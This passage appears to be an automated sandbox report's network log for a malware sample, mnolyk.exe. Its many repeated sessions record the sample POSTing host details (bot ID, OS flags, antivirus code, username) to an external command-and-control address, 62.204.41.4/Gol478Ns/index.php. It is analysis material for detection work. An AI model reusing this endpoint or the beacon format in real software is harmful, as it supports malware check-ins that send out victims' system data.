                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    66 | 192.168.2.3 | 49768 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:33.720031977 CET | 267 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:33.785187006 CET | 267 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:33 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    67 | 192.168.2.3 | 49769 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:34.756431103 CET | 268 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:34.819967031 CET | 268 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:34 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    68 | 192.168.2.3 | 49770 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:35.698493004 CET | 269 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:35.764023066 CET | 269 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:35 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    69 | 192.168.2.3 | 49771 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:36.658549070 CET | 270 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:36.723408937 CET | 270 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:36 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    7 | 192.168.2.3 | 49708 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:11.181340933 CET | 207 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:11.245002985 CET | 208 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    70 | 192.168.2.3 | 49772 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:37.016273022 CET | 271 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:37.082278967 CET | 271 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    71 | 192.168.2.3 | 49773 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:37.289230108 CET | 272 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:37.353562117 CET | 272 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    72 | 192.168.2.3 | 49774 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:37.538022041 CET | 273 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:37.601814032 CET | 273 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    73 | 192.168.2.3 | 49775 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:37.801160097 CET | 274 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:37.866099119 CET | 274 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:37 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    74 | 192.168.2.3 | 49776 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:38.042042017 CET | 274 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:38.105920076 CET | 275 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    75 | 192.168.2.3 | 49777 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:38.278119087 CET | 276 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:38.343957901 CET | 276 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    76 | 192.168.2.3 | 49778 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:38.510711908 CET | 277 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:38.572370052 CET | 277 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    77 | 192.168.2.3 | 49779 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:38.749643087 CET | 278 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:38.814958096 CET | 278 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    78 | 192.168.2.3 | 49780 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:38.981621027 CET | 279 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:39.047365904 CET | 279 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    79 | 192.168.2.3 | 49781 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:39.216996908 CET | 280 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:39.282100916 CET | 280 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    8 | 192.168.2.3 | 49709 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:11.416191101 CET | 208 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:11.481261015 CET | 209 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    80 | 192.168.2.3 | 49782 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:39.471648932 CET | 281 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:39.536150932 CET | 281 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    81 | 192.168.2.3 | 49783 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:39.747318029 CET | 282 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:39.810122013 CET | 282 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                    82 | 192.168.2.3 | 49784 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Timestamp | kBytes transferred | Direction | Data
                                                                    Feb 8, 2023 21:31:39.982750893 CET | 283 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:40.048814058 CET | 283 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
